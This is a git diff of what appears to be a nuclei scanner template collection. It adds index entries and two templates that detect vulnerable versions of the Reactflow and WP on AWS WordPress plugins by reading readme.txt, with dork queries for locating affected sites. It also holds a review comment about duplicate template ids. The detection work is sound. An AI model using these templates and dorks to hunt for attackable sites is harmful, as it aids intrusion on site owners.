diff --git a/date.txt b/date.txt
index d4528d6fc4..6f2cf7ace4 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241221
+20241222
diff --git a/poc.txt b/poc.txt
index 60f4ff7edf..a71e91a7bf 100644
--- a/poc.txt
+++ b/poc.txt
@@ -4880,6 +4880,7 @@
 ./poc/auth/rdp-connections-without-password-allowed.yaml
 ./poc/auth/reactapp-password.yaml
 ./poc/auth/reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a.yaml
+./poc/auth/reactflow-session-replay-heatmap.yaml
 ./poc/auth/readarr-dashboard-unauth.yaml
 ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml
 ./poc/auth/real-cookie-banner-2ba39ea793cd92ced5c4447d57e663b5.yaml
@@ -6921,6 +6922,7 @@
 ./poc/aws/wp-live-chat-support-a354171e3fe06ff8f1d83d5bec2cd4a6.yaml
 ./poc/aws/wp-maintenance-59113e30281ebcf6502fa89059001ec2.yaml
 ./poc/aws/wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809.yaml
+./poc/aws/wp-migrate-2-aws.yaml
 ./poc/aws/wp-nested-pages-c8ec22abe6df2be7ec900d10da0ee46c.yaml
 ./poc/aws/wp-photo-album-plus-aa5e2d80c37dbec28ba2b57b14b13c18.yaml
 ./poc/aws/wp-private-messages-c0d9fc663e406dc24cec2c03687d55c8.yaml
@@ -10323,6 +10325,7 @@
 ./poc/cve/CVE-2014-4537.yaml
 ./poc/cve/CVE-2014-4538-815dca23d1f2b8af9d9f1b320c4ac558.yaml
 ./poc/cve/CVE-2014-4538.yaml
+./poc/cve/CVE-2014-4539-2356.yaml
 ./poc/cve/CVE-2014-4539-2358.yaml
 ./poc/cve/CVE-2014-4539-86076b63a8d6f7ed94e04009da86c5b5.yaml
 ./poc/cve/CVE-2014-4539.yaml
@@ -17894,6 +17897,7 @@
 ./poc/cve/CVE-2021-24277-a9b3b73eb42fa5bd0785720ab1f1312f.yaml
 ./poc/cve/CVE-2021-24277.yaml
 ./poc/cve/CVE-2021-24278-5667.yaml
+./poc/cve/CVE-2021-24278-5668.yaml
 ./poc/cve/CVE-2021-24278-5669.yaml
 ./poc/cve/CVE-2021-24278-e6fbe6efa1e8d2bc3a84e72109aaad1d.yaml
 ./poc/cve/CVE-2021-24278.yaml
@@ -18159,6 +18163,7 @@
 ./poc/cve/CVE-2021-24388.yaml
 ./poc/cve/CVE-2021-24389-06a3e9b6b25dd1aa8ca593f5bb9ce3d3.yaml
 ./poc/cve/CVE-2021-24389-5727.yaml
+./poc/cve/CVE-2021-24389-5729.yaml
 ./poc/cve/CVE-2021-24389-5731.yaml
 ./poc/cve/CVE-2021-24389.yaml
 ./poc/cve/CVE-2021-24390-33ca2ab1d147e6ae40fe998202ee7899.yaml
@@ -19665,6 +19670,7 @@
 ./poc/cve/CVE-2021-25118.yaml
 ./poc/cve/CVE-2021-25119-f5c0b4d298d9925ecfefb6d03108787d.yaml
 ./poc/cve/CVE-2021-25119.yaml
+./poc/cve/CVE-2021-25120(1).yaml
 ./poc/cve/CVE-2021-25120-2cfdef0c57bf89b381b2ca47e005682f.yaml
 ./poc/cve/CVE-2021-25120-5806.yaml
 ./poc/cve/CVE-2021-25120-741620318602be588fe47e36ac60a05f.yaml
@@ -21257,6 +21263,7 @@
 ./poc/cve/CVE-2022-0199.yaml
 ./poc/cve/CVE-2022-0200-a080db633519aa1864ec028708ce4181.yaml
 ./poc/cve/CVE-2022-0200.yaml
+./poc/cve/CVE-2022-0201(1).yaml
 ./poc/cve/CVE-2022-0201-e8037a45d11950f78502700c271f8eb0.yaml
 ./poc/cve/CVE-2022-0201.yaml
 ./poc/cve/CVE-2022-0205-79c3931ac9c5d289f945288d2a273508.yaml
@@ -37048,6 +37055,7 @@
 ./poc/cve/CVE-2024-1044-5720ea5d7eef8537b26bc9836c2599a3.yaml
 ./poc/cve/CVE-2024-1044.yaml
 ./poc/cve/CVE-2024-10453-68cf66b7073e2bbdcfb231b1737ffdbf.yaml
+./poc/cve/CVE-2024-10453.yaml
 ./poc/cve/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml
 ./poc/cve/CVE-2024-1046.yaml
 ./poc/cve/CVE-2024-1047-273d9f70b785499b0bfe887c8e308bb5.yaml
@@ -37358,6 +37366,7 @@
 ./poc/cve/CVE-2024-10796-56d4ab488b35218c5b7041a4c4f135b2.yaml
 ./poc/cve/CVE-2024-10796.yaml
 ./poc/cve/CVE-2024-10797-8735cd5ecd4eb322a4cce0b2bcfa0daf.yaml
+./poc/cve/CVE-2024-10797.yaml
 ./poc/cve/CVE-2024-10798-6a4ce5a3ceec5f176ee898e8447c08f9.yaml
 ./poc/cve/CVE-2024-10798.yaml
 ./poc/cve/CVE-2024-1080-15318692234db11db0354155dd2f2282.yaml
@@ -37622,6 +37631,7 @@
 ./poc/cve/CVE-2024-11195-c691007e253c4054d9b611e5bdf99fc3.yaml
 ./poc/cve/CVE-2024-11195.yaml
 ./poc/cve/CVE-2024-11196-f6d286fa677ac17e271cb0be03129144.yaml
+./poc/cve/CVE-2024-11196.yaml
 ./poc/cve/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml
 ./poc/cve/CVE-2024-11197.yaml
 ./poc/cve/CVE-2024-11198-7108f91753177b57d90e0bcfd7eda520.yaml
@@ -37697,12 +37707,14 @@
 ./poc/cve/CVE-2024-11278-f2f3b28a1bbcb829b720cfe84f4bb1fb.yaml
 ./poc/cve/CVE-2024-11278.yaml
 ./poc/cve/CVE-2024-11279-44f0b55d27530f91d8cdbd7abb1afb80.yaml
+./poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml
 ./poc/cve/CVE-2024-11279.yaml
 ./poc/cve/CVE-2024-1128-67d8835f2e0e8ac11d097612ad9e363c.yaml
 ./poc/cve/CVE-2024-1128.yaml
 ./poc/cve/CVE-2024-11280-5fc818fb5755c827e8f432424205f35a.yaml
 ./poc/cve/CVE-2024-11280.yaml
 ./poc/cve/CVE-2024-11287-33536fea15ec5164056e1863a099338b.yaml
+./poc/cve/CVE-2024-11287.yaml
 ./poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
 ./poc/cve/CVE-2024-11289.yaml
 ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml
@@ -37756,6 +37768,7 @@
 ./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
 ./poc/cve/CVE-2024-11342.yaml
 ./poc/cve/CVE-2024-11349-492c070998afb1c1259a8c8e6c2a2e7c.yaml
+./poc/cve/CVE-2024-11349.yaml
 ./poc/cve/CVE-2024-11351-346ec8802b5c9856cc4de3ce608f3d2b.yaml
 ./poc/cve/CVE-2024-11351.yaml
 ./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
@@ -37956,6 +37969,7 @@
 ./poc/cve/CVE-2024-1168-b3017b867a5b3352aca4d53b40ceb34f.yaml
 ./poc/cve/CVE-2024-1168.yaml
 ./poc/cve/CVE-2024-11682-f008a2d5e25cf2cd1eef864640aea744.yaml
+./poc/cve/CVE-2024-11682.yaml
 ./poc/cve/CVE-2024-11683-ec4fd479846e16d6cba34a03c8af511d.yaml
 ./poc/cve/CVE-2024-11683.yaml
 ./poc/cve/CVE-2024-11684-c29ca2f7fe511fd84c547f32d0da9702.yaml
@@ -37965,6 +37979,7 @@
 ./poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
 ./poc/cve/CVE-2024-11687.yaml
 ./poc/cve/CVE-2024-11688-14d2a5f31dc0e4861931d1fc0c65a354.yaml
+./poc/cve/CVE-2024-11688.yaml
 ./poc/cve/CVE-2024-11689-2f68396da54e847bcebf89b7fb249d95.yaml
 ./poc/cve/CVE-2024-11689.yaml
 ./poc/cve/CVE-2024-1169-007e07b24673895c34505297aed33632.yaml
@@ -37996,6 +38011,7 @@
 ./poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml
 ./poc/cve/CVE-2024-11721.yaml
 ./poc/cve/CVE-2024-11722-13dedbf7f4be1ec6f6f6ff2a845970ec.yaml
+./poc/cve/CVE-2024-11722.yaml
 ./poc/cve/CVE-2024-11723-3366767029ed4cddc51404d71df8d881.yaml
 ./poc/cve/CVE-2024-11723.yaml
 ./poc/cve/CVE-2024-11724-daedb7c1f67f714549143733b33e7b1b.yaml
@@ -38042,6 +38058,7 @@
 ./poc/cve/CVE-2024-11760.yaml
 ./poc/cve/CVE-2024-11761-c12436c899eba37de36a3435c092ea47.yaml
 ./poc/cve/CVE-2024-11761.yaml
+./poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml
 ./poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml
 ./poc/cve/CVE-2024-11763.yaml
 ./poc/cve/CVE-2024-11765-76af6f6ec0d2cae37ca638893b9e6e7c.yaml
@@ -38062,6 +38079,7 @@
 ./poc/cve/CVE-2024-11774.yaml
 ./poc/cve/CVE-2024-11775-e72bc808871e6f6b1ff68d8fcae55f02.yaml
 ./poc/cve/CVE-2024-11775.yaml
+./poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml
 ./poc/cve/CVE-2024-11776-d462ec41233e3d102bf71944a60e6b05.yaml
 ./poc/cve/CVE-2024-11776.yaml
 ./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
@@ -38091,11 +38109,13 @@
 ./poc/cve/CVE-2024-11807-4dfe886308ff3702aa6f118a69b41dde.yaml
 ./poc/cve/CVE-2024-11807.yaml
 ./poc/cve/CVE-2024-11808-e8f2f8bf443bbbf9f355079310951d95.yaml
+./poc/cve/CVE-2024-11808.yaml
 ./poc/cve/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml
 ./poc/cve/CVE-2024-11809.yaml
 ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml
 ./poc/cve/CVE-2024-1181.yaml
 ./poc/cve/CVE-2024-11811-931cffef1fe7884e7e5c1bc5b3f11a46.yaml
+./poc/cve/CVE-2024-11811.yaml
 ./poc/cve/CVE-2024-11812-18a938adfa6071ed20fd7578bc27a8e9.yaml
 ./poc/cve/CVE-2024-11812.yaml
 ./poc/cve/CVE-2024-11813-9a6d1b16c5d6577e7e1c14516dfd9060.yaml
@@ -38120,6 +38140,7 @@
 ./poc/cve/CVE-2024-11844.yaml
 ./poc/cve/CVE-2024-11846-2b66d0ccd63edeb0552c230fce20bb3a.yaml
 ./poc/cve/CVE-2024-11846.yaml
+./poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml
 ./poc/cve/CVE-2024-11853-f5e53babbfd72e76b10eb0e04ce9ba66.yaml
 ./poc/cve/CVE-2024-11853.yaml
 ./poc/cve/CVE-2024-11854-a4609a0b6d30b84bf011e2cc0f757890.yaml
@@ -38164,6 +38185,7 @@
 ./poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml
 ./poc/cve/CVE-2024-11888.yaml
 ./poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml
+./poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml
 ./poc/cve/CVE-2024-11889.yaml
 ./poc/cve/CVE-2024-11891-5fc76ceed31c732ecf98a91613f60c7c.yaml
 ./poc/cve/CVE-2024-11891.yaml
@@ -38172,6 +38194,7 @@
 ./poc/cve/CVE-2024-11894-672b80b4e5ba42bbc36eb516adecdaa7.yaml
 ./poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml
 ./poc/cve/CVE-2024-11894.yaml
+./poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml
 ./poc/cve/CVE-2024-11897-ff5f1c15b11b473bc3f465bc84ff070d.yaml
 ./poc/cve/CVE-2024-11897.yaml
 ./poc/cve/CVE-2024-11898-e1ae02693b266829682dda11586fd4c0.yaml
@@ -38210,6 +38233,7 @@
 ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml
 ./poc/cve/CVE-2024-11935.yaml
 ./poc/cve/CVE-2024-11938-a897d23a992f88a13f8a92c28cfec734.yaml
+./poc/cve/CVE-2024-11938.yaml
 ./poc/cve/CVE-2024-11940-2854432d18024963eba154af3544251e.yaml
 ./poc/cve/CVE-2024-11940.yaml
 ./poc/cve/CVE-2024-11943-9cc06cbd2cda10ebe942d226be8a34ce.yaml
@@ -38221,7 +38245,9 @@
 ./poc/cve/CVE-2024-11973-f69e0f1a9b5be8876a50aaeb0e8cba7f.yaml
 ./poc/cve/CVE-2024-11973.yaml
 ./poc/cve/CVE-2024-11975-05a237ca7357ff8d76d54d31a44bc202.yaml
+./poc/cve/CVE-2024-11975.yaml
 ./poc/cve/CVE-2024-11977-0110488fb1a5f556982113b515b4f15e.yaml
+./poc/cve/CVE-2024-11977.yaml
 ./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
 ./poc/cve/CVE-2024-12003.yaml
 ./poc/cve/CVE-2024-12004-f153a59c093bcc077a8d5197337c2b1a.yaml
@@ -38264,6 +38290,7 @@
 ./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml
 ./poc/cve/CVE-2024-12062.yaml
 ./poc/cve/CVE-2024-12066-a769524de5fd8cbd0b99e8393122048b.yaml
+./poc/cve/CVE-2024-12066.yaml
 ./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml
 ./poc/cve/CVE-2024-1207.yaml
 ./poc/cve/CVE-2024-12072-24b9b896e743f123599e257b8923909a.yaml
@@ -38338,6 +38365,7 @@
 ./poc/cve/CVE-2024-12260-e830e5f6450ff91a722bdd1a788fe6ed.yaml
 ./poc/cve/CVE-2024-12260.yaml
 ./poc/cve/CVE-2024-12262-44dd458108e38e1a10ff93aa59a1bca6.yaml
+./poc/cve/CVE-2024-12262.yaml
 ./poc/cve/CVE-2024-12263-fa7054e9893ee8c27ef6719a5ea1e128.yaml
 ./poc/cve/CVE-2024-12263.yaml
 ./poc/cve/CVE-2024-12265-4d7040bb415a90201c0256916d4da2c7.yaml
@@ -38379,6 +38407,7 @@
 ./poc/cve/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml
 ./poc/cve/CVE-2024-12333.yaml
 ./poc/cve/CVE-2024-12338-5605bf55e24ce1b2233083e5c7c380b3.yaml
+./poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml
 ./poc/cve/CVE-2024-12338.yaml
 ./poc/cve/CVE-2024-1234-f40f3ae232b12cf9233c22ef4e6ba985.yaml
 ./poc/cve/CVE-2024-1234.yaml
@@ -38402,6 +38431,7 @@
 ./poc/cve/CVE-2024-12406-875253838d8ed29a504f0efa7c687009.yaml
 ./poc/cve/CVE-2024-12406.yaml
 ./poc/cve/CVE-2024-12408-260120a293bed72f17136733a5d35a68.yaml
+./poc/cve/CVE-2024-12408.yaml
 ./poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml
 ./poc/cve/CVE-2024-12411.yaml
 ./poc/cve/CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292.yaml
@@ -38451,6 +38481,7 @@
 ./poc/cve/CVE-2024-12500.yaml
 ./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml
 ./poc/cve/CVE-2024-12501.yaml
+./poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml
 ./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml
 ./poc/cve/CVE-2024-12502.yaml
 ./poc/cve/CVE-2024-12506-cf470529a5d6c836ebd2593b5d0d238a.yaml
@@ -38470,6 +38501,7 @@
 ./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml
 ./poc/cve/CVE-2024-12555.yaml
 ./poc/cve/CVE-2024-12558-027030512640daa77ea3d82e9a1d2312.yaml
+./poc/cve/CVE-2024-12558.yaml
 ./poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml
 ./poc/cve/CVE-2024-12560.yaml
 ./poc/cve/CVE-2024-12571-f40f1a845a76c59ba969efe2f001fffb.yaml
@@ -38485,7 +38517,9 @@
 ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml
 ./poc/cve/CVE-2024-12581.yaml
 ./poc/cve/CVE-2024-12588-74fdbee90e8f1569c31b65ae5ac69c79.yaml
+./poc/cve/CVE-2024-12588.yaml
 ./poc/cve/CVE-2024-12591-2661762fc85d1a9540507c69b111201b.yaml
+./poc/cve/CVE-2024-12591.yaml
 ./poc/cve/CVE-2024-12596-774434bb9ea28259fa8266e81972c00f.yaml
 ./poc/cve/CVE-2024-12596.yaml
 ./poc/cve/CVE-2024-12601-b82cf7ad4580a990c2c5594b0652b203.yaml
@@ -38495,8 +38529,11 @@
 ./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml
 ./poc/cve/CVE-2024-12628.yaml
 ./poc/cve/CVE-2024-12635-092a05628ca831a1bb9c607c24d54577.yaml
+./poc/cve/CVE-2024-12635.yaml
 ./poc/cve/CVE-2024-12697-8db77733a75f37172aa83e4825bd6e85.yaml
+./poc/cve/CVE-2024-12697.yaml
 ./poc/cve/CVE-2024-12721-e696c3790eb4b1341769185b659235b2.yaml
+./poc/cve/CVE-2024-12721.yaml
 ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml
 ./poc/cve/CVE-2024-1273.yaml
 ./poc/cve/CVE-2024-1274-99ad6cb9c59b62a5b587ddfed8885ae2.yaml
@@ -38506,6 +38543,7 @@
 ./poc/cve/CVE-2024-1277-c0472cd2f2d47ecb572d1b740758f8aa.yaml
 ./poc/cve/CVE-2024-1277.yaml
 ./poc/cve/CVE-2024-12771-cd6721ae7264b86b9c92e3b0360445d3.yaml
+./poc/cve/CVE-2024-12771.yaml
 ./poc/cve/CVE-2024-1278-647797a8bf03897ebf803aa058161703.yaml
 ./poc/cve/CVE-2024-1278.yaml
 ./poc/cve/CVE-2024-1279-c5ebaedae6f5a39d336cc34b0dda57a1.yaml
@@ -38519,6 +38557,7 @@
 ./poc/cve/CVE-2024-1287-efe3489231c31f4d43f77c6de501ea78.yaml
 ./poc/cve/CVE-2024-1287.yaml
 ./poc/cve/CVE-2024-12875-fdfbb98d9e9a1f9c1127b7881e3d0e1b.yaml
+./poc/cve/CVE-2024-12875.yaml
 ./poc/cve/CVE-2024-1288-ad8e303714cb9fe760dadd732ba57794.yaml
 ./poc/cve/CVE-2024-1288.yaml
 ./poc/cve/CVE-2024-1289-211181e3b234d5799f76a84c8d6b1a61.yaml
@@ -52092,6 +52131,7 @@
 ./poc/cve/CVE-2024-9543-2a84b7caa56d7b7baa1f298aba568720.yaml
 ./poc/cve/CVE-2024-9543.yaml
 ./poc/cve/CVE-2024-9545-383a080b0508dbca93fe0cae0c28ae26.yaml
+./poc/cve/CVE-2024-9545.yaml
 ./poc/cve/CVE-2024-9546-393c04a252e7afb4c4921ddce751cf73.yaml
 ./poc/cve/CVE-2024-9546.yaml
 ./poc/cve/CVE-2024-9548-4c3a7fa475046e4dcaed7de30c0d051a.yaml
@@ -66934,6 +66974,7 @@
 ./poc/injection/74cms-Template-Injection-rce.yaml
 ./poc/injection/74cms-v3-Boolean-injection.yaml
 ./poc/injection/Command Injection.yaml
+./poc/injection/Command-Injection.yaml
 ./poc/injection/GLPI-9.3.3-SQL-Injection.yaml
 ./poc/injection/Header-Injection.yaml
 ./poc/injection/PHP - Command injection.yaml
@@ -70928,6 +70969,7 @@
 ./poc/microsoft/smsa-shipping-for-woocommerce-15e38eb587a64dc844ec6f253c86a305.yaml
 ./poc/microsoft/smsa-shipping-for-woocommerce.yaml
 ./poc/microsoft/smsa-shipping-official-f19b56a54562a16962217b4283cfecb5.yaml
+./poc/microsoft/smsa-shipping-official.yaml
 ./poc/microsoft/smsify-ad1209d7c6326409ba6a9eb7af4aa164.yaml
 ./poc/microsoft/smsify.yaml
 ./poc/microsoft/smsmaster-476a7e3a40fa1e840322928f3de2f63f.yaml
@@ -85409,6 +85451,7 @@
 ./poc/other/addthis-plugin.yaml
 ./poc/other/addthis.yaml
 ./poc/other/adforest-e83f34353ce1bb79d2c778a1988f4ca8.yaml
+./poc/other/adforest.yaml
 ./poc/other/adfoxly-1c77bc97f662cb2c20483d034e173297.yaml
 ./poc/other/adfoxly-3eb667180bcaf12c6c10c99114ccf3b8.yaml
 ./poc/other/adfoxly-4c613eb3f9ae83b4f2727f836be94578.yaml
@@ -88128,6 +88171,7 @@
 ./poc/other/bdthemes-element-pack-lite-c6829522c8e27d6b9c8f5bf83877d258.yaml
 ./poc/other/bdthemes-element-pack-lite-d09dc2c8702152421fafacc3ee5ef7d2.yaml
 ./poc/other/bdthemes-element-pack-lite-e75b379cf6355c3c75badc4442c21743.yaml
+./poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml
 ./poc/other/bdthemes-element-pack-lite-f71561f71d98bd754d22aea0a3060cfe.yaml
 ./poc/other/bdthemes-element-pack-lite-fd25739750193b1934e6e3650f6ca4a2.yaml
 ./poc/other/bdthemes-element-pack-lite.yaml
@@ -98039,6 +98083,7 @@
 ./poc/other/full-page-blog-designer-ff9293ba28748efa2ab9a2fe77385468.yaml
 ./poc/other/full-page-blog-designer.yaml
 ./poc/other/full-screen-menu-for-elementor-d260d7eb2da867209574048a4e6c77b0.yaml
+./poc/other/full-screen-menu-for-elementor.yaml
 ./poc/other/full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae.yaml
 ./poc/other/full-screen-page-background-image-slideshow.yaml
 ./poc/other/full-site-editing-24836cca8d46e399082ff66df1b9f2f5.yaml
@@ -103269,6 +103314,7 @@
 ./poc/other/magicform.yaml
 ./poc/other/magicmail.yaml
 ./poc/other/magicpost-6538fe9c7722fa6358b7d4a11ba3b7cc.yaml
+./poc/other/magicpost.yaml
 ./poc/other/magix.yaml
 ./poc/other/magmi-workflow.yaml
 ./poc/other/magnitudo-08d4fcc2d75478c02a0b3e70805823f7.yaml
@@ -107733,6 +107779,7 @@
 ./poc/other/ping-list-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/ping-list-pro-plugin.yaml
 ./poc/other/ping-list-pro.yaml
+./poc/other/pingmeter-uptime-monitoring.yaml
 ./poc/other/pinkbike.yaml
 ./poc/other/pinpoint.yaml
 ./poc/other/pinterest-pin-it-button-on-image-hover-and-post-196869e0a4feff678ee2e7f2514404b4.yaml
@@ -119189,6 +119236,7 @@
 ./poc/other/woo-nmi-three-step-plugin.yaml
 ./poc/other/woo-nmi-three-step.yaml
 ./poc/other/woo-one-click-upsell-funnel-98ebab5be77d58e4cde51e12bd3679c2.yaml
+./poc/other/woo-one-click-upsell-funnel.yaml
 ./poc/other/woo-order-export-lite-3e1a792b5b6f662aa344faa9b02c403d.yaml
 ./poc/other/woo-order-export-lite-929b62df5140955c6b18d3bfadeb9f57.yaml
 ./poc/other/woo-order-export-lite-9d07a9d92ce55bba4fd7fe6b21f1c057.yaml
@@ -124040,6 +124088,7 @@
 ./poc/remote_code_execution/wantit-erp-rce.yaml
 ./poc/remote_code_execution/wavlnk_router_rce.yaml
 ./poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce-0d6d3a2eb43a5b249c178d2b2d5f4cb5.yaml
+./poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml
 ./poc/remote_code_execution/wc-customer-source-3baa6cc7c9b97bdb322dbcfa3bb0f658.yaml
 ./poc/remote_code_execution/wc-customer-source.yaml
 ./poc/remote_code_execution/weaver-e-mobile-rce.yaml
@@ -128940,6 +128989,7 @@
 ./poc/sql/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml
 ./poc/sql/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml
 ./poc/sql/CVE-2024-11279-44f0b55d27530f91d8cdbd7abb1afb80.yaml
+./poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml
 ./poc/sql/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml
 ./poc/sql/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml
 ./poc/sql/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml
@@ -138460,6 +138510,7 @@
 ./poc/web/google-website-translator.yaml
 ./poc/web/gotweb-detect.yaml
 ./poc/web/gwebpro-store-locator-a48522809c277db29c19ddd5318a9a6f.yaml
+./poc/web/gwebpro-store-locator.yaml
 ./poc/web/h2-database-web-console-unauthorized-access.yaml
 ./poc/web/h2-database-web-console-unauthorized-access.yml
 ./poc/web/h3c-web-managerment-home.yaml
@@ -144768,6 +144819,7 @@
 ./poc/wordpress/wp-microblogs-b79ee3b117bf563b5053a87d9a8d154e.yaml
 ./poc/wordpress/wp-microblogs.yaml
 ./poc/wordpress/wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809.yaml
+./poc/wordpress/wp-migrate-2-aws.yaml
 ./poc/wordpress/wp-migrate-db-pro-13aac3da620867d00a2f14aa8693ee41.yaml
 ./poc/wordpress/wp-migrate-db-pro.yaml
 ./poc/wordpress/wp-migrate-db.yaml
diff --git a/poc/auth/reactflow-session-replay-heatmap.yaml b/poc/auth/reactflow-session-replay-heatmap.yaml
new file mode 100644
index 0000000000..ecfa5fa015
--- /dev/null
+++ b/poc/auth/reactflow-session-replay-heatmap.yaml
@@ -0,0 +1,59 @@ +id: reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a + +info: + name: > + Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/" + google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reactflow-session-replay-heatmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.10') \ No newline at end of file diff --git a/poc/aws/wp-migrate-2-aws.yaml b/poc/aws/wp-migrate-2-aws.yaml new file mode 100644 index 0000000000..6da15ed022 --- /dev/null +++ b/poc/aws/wp-migrate-2-aws.yaml 
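Review bot: The `id` on the first added line, `reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a`, is the same id that the already-indexed `./poc/auth/reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a.yaml` carries in its filename, and nuclei deduplicates templates by id at load time, so one of the two copies is expected to be skipped with a duplicate-id warning; give this file its own id (the filename stem would do) or drop the copy. The bare `cvss-metrics:`, `cvss-score:` and `cve-id:` keys under `classification` parse as YAML null rather than empty strings, and `description: >` with nothing under it is an empty string, so the template is tagged `cve` while carrying no CVE id at all — fill them in or remove the empty keys. The same duplicate-id and empty-classification pattern is in the `wp-migrate-2-aws.yaml` hunk that follows (its id matches the existing `wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809.yaml`), and the duplicate id alone also applies to the `CVE-2024-10453.yaml` and `CVE-2024-10797.yaml` hunks. Both of the first two files also end without a trailing newline.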
@@ -0,0 +1,59 @@ +id: wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809 + +info: + name: > + WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-migrate-2-aws/" + google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-migrate-2-aws" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2014-4539-2356.yaml b/poc/cve/CVE-2014-4539-2356.yaml new file mode 100644 index 0000000000..6d6a56000d --- /dev/null +++ 